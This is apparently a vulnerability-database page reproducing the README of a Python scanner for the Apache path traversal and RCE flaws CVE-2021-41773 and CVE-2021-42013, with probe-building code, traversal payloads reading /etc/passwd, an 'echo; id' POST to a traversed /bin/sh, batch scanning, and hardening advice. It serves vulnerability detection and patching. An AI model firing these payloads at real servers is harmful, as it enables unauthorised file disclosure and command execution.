Related vulnerability
Title: Apache HTTP Server security vulnerability (CVE-2021-42013). Description: Apache HTTP Server is an open-source web server from the Apache Software Foundation (USA). It is fast, reliable and extensible through a simple API. The vulnerability stems from the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 being insufficient. An attacker can use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If, in addition, these alias
Introduction
# CVE-2021-41773 / CVE-2021-42013 Apache Vulnerability Scanner
A comprehensive Python-based vulnerability scanner for detecting **CVE-2021-41773** and **CVE-2021-42013** path traversal and remote code execution vulnerabilities in Apache HTTP Server versions 2.4.49 and 2.4.50.
## Overview
CVE-2021-41773 and CVE-2021-42013 are critical path-traversal flaws in Apache HTTP Server 2.4.49 and 2.4.50 that allow attackers to:
- **Read arbitrary files** outside alias-mapped directories (path traversal), provided those files are not covered by the default `Require all denied` block on the filesystem root
- **Execute arbitrary code** by traversing from a CGI-enabled alias to an interpreter such as `/bin/sh` (remote code execution), provided mod_cgi or mod_cgid is enabled
- **Bypass security restrictions** through faulty URL path normalization
Both flaws were disclosed in October 2021 and were exploited in the wild.
## Vulnerabilities Explained
### CVE-2021-41773 (Apache 2.4.49)
- **Type**: Path Traversal + Remote Code Execution
- **CVSS Score**: 9.8 Critical
- **Affected Versions**: Apache HTTP Server 2.4.49
- **Root Cause**: The path normalization introduced in 2.4.49 did not treat an encoded dot segment (`.%2e`) as `..`, so the segment survived normalization and was decoded afterwards, escaping the alias-mapped directory
- **Impact**: Read sensitive files such as `/etc/passwd`; execute arbitrary commands if mod_cgi is enabled
### CVE-2021-42013 (Apache 2.4.50)
- **Type**: Path Traversal + Remote Code Execution
- **CVSS Score**: 9.8 Critical
- **Affected Versions**: Apache HTTP Server 2.4.50
- **Root Cause**: The 2.4.50 fix for CVE-2021-41773 checked for `.%2e` but not for a second layer of encoding; `.%%32%65` decodes to `.%2e` on the first pass and to `..` on the second
- **Impact**: Same as CVE-2021-41773, but against the release that was meant to fix it
## Features
✅ **Dual CVE Detection**: Tests for both CVE-2021-41773 and CVE-2021-42013
✅ **Path Traversal Testing**: Multiple payload variations for file access attempts
✅ **RCE Testing**: Remote code execution verification if mod_cgi is enabled
✅ **Batch Scanning**: Scan multiple targets from a file
✅ **Color-Coded Output**: Easy-to-read formatted results
✅ **Customizable Timeout**: Adjustable request timeout for unreliable networks
✅ **Custom User-Agent**: Sends a spoofed User-Agent instead of the default `python-requests` string, which may get past filters that key on it (this is not a WAF bypass)
## Requirements
- Python 3.6+
- `requests` library
- `colorama` library
## Installation
### Clone the Repository
```bash
git clone https://github.com/drackyjr/CVE-2021-42013.git
cd CVE-2021-42013
```
### Install Dependencies
```bash
pip3 install -r requirements.txt
```
Or manually install:
```bash
pip3 install requests colorama
```
## Usage
### Single Target Scan
```bash
python3 cve_scanner.py -u http://192.168.1.100
```
### HTTPS Target
```bash
python3 cve_scanner.py -u https://target.com
```
### Custom Timeout
```bash
python3 cve_scanner.py -u http://target.com -t 15
```
### Batch Scanning
```bash
python3 cve_scanner.py -l targets.txt
```
### Help
```bash
python3 cve_scanner.py -h
```
## Command-Line Arguments
| Argument | Short | Type | Description |
|----------|-------|------|-------------|
| `--url` | `-u` | STRING | Target URL (e.g., http://example.com) |
| `--list` | `-l` | FILE | File containing list of targets (one per line) |
| `--timeout` | `-t` | INTEGER | Request timeout in seconds (default: 10) |
## Example Usage
### Single Target
```bash
python3 cve_scanner.py -u http://192.168.1.100
```
### Multiple Targets
Create `targets.txt`:
```
http://192.168.1.100
https://example.com:8080
http://10.0.0.50
https://vulnerable.server.com
```
Then run:
```bash
python3 cve_scanner.py -l targets.txt -t 15
```
### Extended Timeout for Slow Networks
```bash
python3 cve_scanner.py -u http://target.com -t 30
```
## Output
The scanner provides detailed output including:
- **Vulnerability Detection Status**: Whether each CVE is detected
- **Payload Information**: Which payload triggered the vulnerability
- **Response Data**: Sample of the server response
- **Recommendations**: Patching guidance
Example output:
```
============================================================
CVE-2021-41773 / CVE-2021-42013 Vulnerability Scanner
============================================================
[*] Target: http://192.168.1.100
[*] Testing CVE-2021-41773 (Apache 2.4.49)...
[+] VULNERABLE to CVE-2021-41773!
[+] Payload: /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
[+] Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
============================================================
Scan Summary
============================================================
[!] Target is VULNERABLE!
[!] Immediate patching required!
[*] Recommendation: Upgrade to Apache HTTP Server 2.4.51 or later
============================================================
```
## How It Works
### CVE-2021-41773 Detection
1. Sends requests whose traversal segments are single URL-encoded (`.%2e`, which 2.4.49 failed to normalize to `..` before mapping the path)
2. Targets the alias-mapped prefixes `/cgi-bin/`, `/icons/`, `/images/`
3. Attempts to read `/etc/passwd` and `/etc/shadow` (the latter only succeeds when httpd runs as root, which is rare)
4. Tests command execution with POST requests to a traversed `/bin/sh` path under `/cgi-bin/`
### CVE-2021-42013 Detection
1. Sends requests whose traversal segments are double URL-encoded (`.%%32%65`, which decodes to `.%2e` and then to `..`)
2. Uses the same target prefixes as CVE-2021-41773
3. Bypasses the incomplete fix shipped in Apache 2.4.50
4. Verifies RCE capability if mod_cgi is enabled
### RCE Testing
- POSTs a body such as `echo; id` to the traversed `/bin/sh`; the leading `echo;` produces the blank line that terminates the CGI header block, so the command output is returned in the response body
- Works only if mod_cgi (or mod_cgid) handles the aliased path and the traversal resolves to an executable interpreter
- Looks for `uid=` and `gid=` in the response
## Detection Indicators
The scanner looks for:
- **Successful path traversal**: Response contains `root:` or `daemon:` entries from `/etc/passwd`
- **Successful RCE**: Response contains `uid=` and `gid=` from `id` command execution
- **HTTP Status Code**: 200 OK together with the expected content; a 200 on its own is not evidence, since error pages and directory listings also return 200
A honeypot or WAF decoy can return a fabricated `/etc/passwd`, so confirm a positive result with a second indicator (a different file, or the RCE check) before reporting it.
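How the pieces above fit together, as an added example that is not the project's `cve_scanner.py`: it builds the single- and double-encoded traversal probes for each alias prefix, classifies responses with the indicators listed in this section, and runs against a constructed fake server so it works offline. The fake's alias-to-filesystem mapping, the `www-data` identity and the `make_fake_server`/`scan` names are assumptions for the illustration; the fake decodes twice and therefore accepts both encodings, whereas a real host accepts one or the other depending on its version.

```python
"""Probe construction and response classification for the CVE-2021-41773 /
CVE-2021-42013 checks. Added illustration, not the project's cve_scanner.py."""
import posixpath
import re
from typing import Callable, Dict, List, NamedTuple, Optional, Set, Tuple
from urllib.parse import unquote

# Alias-mapped URL prefixes named in "How It Works".
ALIAS_DIRS = ("/cgi-bin/", "/icons/", "/images/")

# One traversal segment per CVE: 2.4.49 let ".%2e" through normalization and
# decoded it to ".." later; 2.4.50 caught ".%2e" but not ".%%32%65", which
# becomes ".%2e" after one decode and ".." after a second.
TRAVERSAL = {"CVE-2021-41773": ".%2e", "CVE-2021-42013": ".%%32%65"}

# Indicators from "Detection Indicators": passwd(5) entries and id(1) output.
PASSWD_RE = re.compile(r"^(?:root|daemon):[^:]*:\d+:\d+:", re.M)
ID_RE = re.compile(r"uid=\d+(?:\([^)]*\))?\s+gid=\d+")
Transport = Callable[[str, str, Optional[str]], Tuple[int, str]]


class Probe(NamedTuple):
    cve: str
    method: str
    path: str
    body: Optional[str]


def build_probes(depth: int = 4, target_file: str = "/etc/passwd") -> List[Probe]:
    """File-read GETs for every alias prefix plus the POST to /bin/sh.
    depth=4 reproduces the README's sample payload; an alias whose filesystem
    target sits deeper than four directories needs a larger depth."""
    probes: List[Probe] = []
    for cve, seg in TRAVERSAL.items():
        climb = "/".join([seg] * depth)
        for alias in ALIAS_DIRS:
            probes.append(Probe(cve, "GET", f"{alias}{climb}{target_file}", None))
        # RCE probe (mod_cgi only): "echo;" emits the blank line that ends the
        # CGI header block, so the output of "id" comes back as the body.
        probes.append(Probe(cve, "POST", f"/cgi-bin/{climb}/bin/sh", "echo; id"))
    return probes


def classify(status: int, body: str) -> Optional[str]:
    """'rce', 'file_read' or None; a 200 alone proves nothing, the body must match."""
    if status != 200:
        return None
    if ID_RE.search(body):
        return "rce"
    if PASSWD_RE.search(body):
        return "file_read"
    return None


def scan(send: Transport) -> Dict[str, Set[str]]:
    """Run every probe through send(method, path, body) -> (status, text)."""
    findings: Dict[str, Set[str]] = {cve: set() for cve in TRAVERSAL}
    for probe in build_probes():
        verdict = classify(*send(probe.method, probe.path, probe.body))
        if verdict:
            findings[probe.cve].add(verdict)
    return findings


# Constructed fake server (assumed paths and identity). It models the bug
# crudely, decoding twice before mapping the alias and collapsing "..", so it
# accepts BOTH encodings; a real host accepts one or the other by version.
FAKE_ALIASES = {"/cgi-bin/": "/usr/lib/cgi-bin/",
                "/icons/": "/usr/share/apache2/icons/",
                "/images/": "/var/www/images/"}
FAKE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
               "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")


def make_fake_server(require_all_denied: bool) -> Transport:
    """require_all_denied=True models the stock `<Directory /> Require all denied`."""
    def send(method: str, path: str, body: Optional[str]) -> Tuple[int, str]:
        decoded = unquote(unquote(path))
        for prefix, fsdir in FAKE_ALIASES.items():
            if decoded.startswith(prefix):
                resolved = posixpath.normpath(fsdir + decoded[len(prefix):])
                break
        else:
            return 404, "<h1>Not Found</h1>"
        if require_all_denied and not resolved.startswith(fsdir):
            return 403, "<h1>Forbidden</h1>"
        if resolved == "/etc/passwd":
            return 200, FAKE_PASSWD
        if resolved == "/bin/sh" and method == "POST" and body:
            return 200, "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
        return 404, "<h1>Not Found</h1>"
    return send


if __name__ == "__main__":
    for label, flag in (("exposed", False), ("default deny", True)):
        for cve, hits in scan(make_fake_server(flag)).items():
            print(f"{label:13}{cve}: {sorted(hits) or 'not detected'}")
```

Wiring the real transport is one function: `send` wraps `requests.request(method, base_url + path, data=body, timeout=...)` and returns `(r.status_code, r.text)`. The `require_all_denied=True` run shows why the stock `<Directory />` block matters: the same traversal resolves to `/etc/passwd` and `/bin/sh` but is refused with 403, which `classify()` reports as not detected.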
## Mitigation
### Immediate Actions
1. **Upgrade Apache HTTP Server** to version 2.4.51 or later; this is the only complete fix, since 2.4.50 is itself vulnerable to CVE-2021-42013
2. **Disable mod_cgi / mod_cgid** if CGI is not required; without them the traversal is limited to file disclosure
3. **Keep the default deny on the filesystem root**. Both advisories apply only when files outside the aliased directories are not protected by this block, which stock httpd configurations ship with:
```apache
<Directory />
    AllowOverride None
    Require all denied
</Directory>
```
### Configuration Hardening
```apache
# <Directory> takes a filesystem path, so name the ScriptAlias target, not
# the /cgi-bin URL prefix. /usr/lib/cgi-bin is the Debian/Ubuntu default;
# adjust for your layout. Denying it disables CGI entirely.
<Directory "/usr/lib/cgi-bin">
    Require all denied
</Directory>
# Disable symbolic links if not needed (general hardening, unrelated to these CVEs)
Options -FollowSymLinks
# Security headers (require mod_headers; unrelated to these CVEs)
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "DENY"
```
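The weak and corrected settings side by side, as an added illustration that is not configuration from the scanner's repository. They are two alternatives, not one file. The `/usr/lib/cgi-bin` path is the Debian/Ubuntu default and is an assumption; substitute your own ScriptAlias target.

```apache
# WEAK: a blanket grant on the filesystem root is what lets the traversal
# succeed on 2.4.49/2.4.50. A URL that normalizes to /etc/passwd is served
# and, under a CGI alias, a URL that resolves to /bin/sh is executed.
<Directory />
    Require all granted
</Directory>
ScriptAlias "/cgi-bin/" "/usr/lib/cgi-bin/"

# CORRECTED: the stock httpd default. Everything outside the alias target is
# denied, so the traversed request is refused with 403 even on an unpatched
# build. Grant access only to the CGI directory itself. (Apache comments must
# begin a line; a trailing comment after a directive is a syntax error.)
<Directory />
    AllowOverride None
    Require all denied
</Directory>
ScriptAlias "/cgi-bin/" "/usr/lib/cgi-bin/"
<Directory "/usr/lib/cgi-bin/">
    AllowOverride None
    Options None
    Require all granted
</Directory>
```

Validate with `apachectl configtest` (or `apache2ctl configtest` on Debian/Ubuntu) before reloading. This is defence in depth, not a substitute for upgrading to 2.4.51 or later.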
### Version Check
```bash
# Debian/Ubuntu package name
apache2 -v
# RHEL/Fedora/Alpine and source builds
httpd -v
# Confirm whether the CGI modules are loaded (apachectl -M or httpd -M elsewhere)
apache2ctl -M | grep -i cgi
```
The remote `Server:` banner may be hidden or shortened by `ServerTokens`, so a missing version in the banner is not evidence of a patched host; check the version on the host itself.
## Supported Apache Versions
| Version | Status | Action |
|---------|--------|--------|
| < 2.4.49 | ✅ Not affected by these two CVEs | Keep current for other advisories |
| 2.4.49 | ❌ Vulnerable to CVE-2021-41773 | Upgrade immediately |
| 2.4.50 | ⚠️ Partially Patched (fixes CVE-2021-41773, vulnerable to CVE-2021-42013) | Upgrade to 2.4.51+ |
| 2.4.51+ | ✅ Patched | No action needed for these CVEs |
## Disclaimer
⚠️ **IMPORTANT**: This tool is intended **ONLY** for authorized security testing and educational purposes. Unauthorized access to computer systems is **ILLEGAL** under laws like the Computer Fraud and Abuse Act (CFAA) and similar legislation worldwide.
**Authorized Use Only:**
- Penetration testing with written permission
- Security audits of your own infrastructure
- CTF competitions and training platforms (TryHackMe, HackTheBox, etc.)
- Educational and research purposes
**Misuse Warning**: Users are responsible for ensuring they have explicit authorization before testing any target. The authors assume no liability for unauthorized use.
## Use Cases
This scanner is ideal for:
### Security Professionals
- Vulnerability assessment and management
- Penetration testing engagements
- Security audits of Apache infrastructure
- Compliance verification (PCI-DSS, etc.)
### System Administrators
- Identifying vulnerable Apache instances
- Validating patch deployment
- Infrastructure security audits
- Server inventory scanning
### Cybersecurity Students
- Learning vulnerability exploitation
- Understanding path traversal attacks
- CTF challenge solving
- Security research and education
### DevOps/DevSecOps
- Infrastructure vulnerability scanning
- CI/CD pipeline security checks
- Container scanning (if running Apache)
- Pre-deployment security verification
## Files
```
.
├── cve_scanner.py # Main scanner script
├── requirements.txt # Python dependencies
├── README.md # This file
├── targets.txt # Example target list
└── LICENSE # License information
```
## Configuration Files
### requirements.txt
```
requests==2.28.1
colorama==0.4.5
```
### targets.txt (Example)
```
http://192.168.1.100
https://vulnerable.example.com
http://10.0.0.50:8080
```
## Troubleshooting
### Issue: Connection Timeout
**Solution**: Increase timeout with `-t` option
```bash
python3 cve_scanner.py -u http://target.com -t 30
```
### Issue: SSL Certificate Error
**Solution**: The script disables TLS certificate verification by default, so a self-signed lab certificate is not an error. This also means a man-in-the-middle could alter responses, so treat results obtained over untrusted networks accordingly. If certificate errors still appear, update the CA bundle:
```bash
pip3 install --upgrade certifi
```
### Issue: Module Not Found
**Solution**: Ensure all dependencies are installed
```bash
pip3 install -r requirements.txt
```
### Issue: Permission Denied
**Solution**: Make the script executable
```bash
chmod +x cve_scanner.py
python3 cve_scanner.py -u http://target.com
```
## Performance Tips
- **Batch Scanning**: Use `-l` with a target file for multiple scans
- **Parallel Scanning**: For large-scale scanning, run multiple instances with task splitting
- **Timeout Optimization**: Lower timeout values for fast networks, higher for slow connections
- **Target Validation**: Verify targets are reachable before batch scanning
## References
- [NVD CVE-2021-41773](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)
- [NVD CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
- [Apache HTTP Server 2.4 Security Advisories](https://httpd.apache.org/security/vulnerabilities_24.html)
- [Qualys Security Research](https://blog.qualys.com/vulnerabilities-threat-research/)
## Contributing
Contributions are welcome! To contribute:
1. **Fork** the repository
2. **Create** a feature branch (`git checkout -b feature/improvement`)
3. **Commit** your changes (`git commit -m 'Add improvement'`)
4. **Push** to the branch (`git push origin feature/improvement`)
5. **Submit** a Pull Request
Please ensure:
- Code follows PEP 8 standards
- Comments explain complex logic
- Payloads are tested for effectiveness
- README is updated if adding features
## License
This project is licensed under the MIT License. See the LICENSE file for details.
## Author
**Security Testing Tool**
Created for educational and authorized security testing purposes.
For questions, issues, or suggestions, please open an issue on GitHub.
## Changelog
### Version 1.0.0 (Initial Release)
- ✅ CVE-2021-41773 detection
- ✅ CVE-2021-42013 detection
- ✅ Path traversal testing
- ✅ RCE capability verification
- ✅ Batch scanning support
- ✅ Color-coded output
- ✅ Customizable timeout
## Security Notes
- The scanner sends HTTP requests to target servers
- It does not modify any files on target systems
- TLS certificate verification is disabled for flexibility, so responses obtained over untrusted networks could be tampered with
- A spoofed User-Agent is sent; it hides the default library string but is not a WAF bypass
- Results should be validated before taking action
- Always maintain logs of authorized testing
---
**Last Updated**: November 2025
**Status**: Active Development
**Tested On**: Python 3.8+, Apache 2.4.49, 2.4.50
File snapshot
[4.0K] /data/pocs/a968b7130cd7bd5204ce05b7f5ad94369332d637
├── [9.7K] CVE-2021-41773.py
└── [ 11K] README.md
1 directory, 2 files